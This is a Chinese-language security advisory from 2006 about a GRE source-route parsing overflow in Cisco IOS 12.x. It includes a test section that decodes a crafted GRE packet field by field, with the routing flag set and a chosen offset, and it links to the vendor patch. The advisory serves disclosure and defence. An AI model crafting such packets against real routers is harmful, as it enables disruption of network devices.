信息来源:绿盟科技
Cisco IOS GRE报文路由选项解析溢出漏洞
发布日期:2006-09-06
更新日期:2006-09-07
受影响系统:
Cisco IOS 12.2
Cisco IOS 12.1
Cisco IOS 12.0
描述:
--------------------------------------------------------------------------------
Cisco互联网操作系统(IOS)是Cisco设备所使用的操作系统。
Cisco Systems IOS在解析包含有GRE源路由信息的GRE报文时存在漏洞,远程攻击者可能导致设备处理报文出错。
如果收到了特制的GRE报文的话,IOS设备没有验证偏移字段是否指向报文内,如果偏移值被设置为负值,IOS直接从包含有IP报文全长的整数中减去了偏移,导致缓冲区访问越界溢出。这可能导致将报文环缓冲区(ring buffer)的其他内存内容解释为负载IP报文并以很大的长度信息重新注入到路由队列中:
GRE decapsulated IP 0.3.74.0->0.0.1.30 (len=65407, ttl=39)
GRE decapsulated IP 176.94.8.0->0.0.0.0 (len=64904, ttl=0)
GRE decapsulated IP 0.15.31.193->176.94.8.0 (len=64894, ttl=237)
GRE decapsulated IP 128.42.131.220->128.0.3.74 (len=64884, ttl=128)
如果能够使用在适当的偏移处包含有IP头的合法通讯精心填充环缓冲区的话,攻击者就可以在IOS中创建有很大长度值的IP报文。
<*来源:FX (
fx@phenoelit.de)
链接:
http://marc.theaimsgroup.com/?l= ... 56581129301&w=2
http://www.cisco.com/en/US/tech/ ... 186a008072cd7b.html
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Internet Protocol,
Src Addr: 85.158.1.110 (85.158.1.110),
Dst Addr: 198.133.219.25 (198.133.219.25)
Version: 4
Header length: 20 bytes
Differentiated Services Field: 0x00
Total Length: 28
Identification: 0xaffe (45054)
Flags: 0x00
Fragment offset: 0
Time to live: 30
Protocol: GRE (0x2f)
Header checksum: 0xf409 (correct)
Source: 85.158.1.110 (85.158.1.110)
Destination: 198.133.219.25 (198.133.219.25)
Generic Routing Encapsulation (IP)
Flags and version: 0x4000
0... .... .... .... = No checksum
.1.. .... .... .... = Routing
..0. .... .... .... = No key
...0 .... .... .... = No sequence number
.... 0... .... .... = No strict source route
.... .000 .... .... = Recursion control: 0
.... .... 0000 0... = Flags: 0
.... .... .... .000 = Version: 0
Protocol Type: IP (0x0800)
Checksum: 0x0000
Offset: 99
建议:
--------------------------------------------------------------------------------
厂商补丁:
Cisco
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.cisco.com/en/US/tech/ ... 186a008072cd7b.html
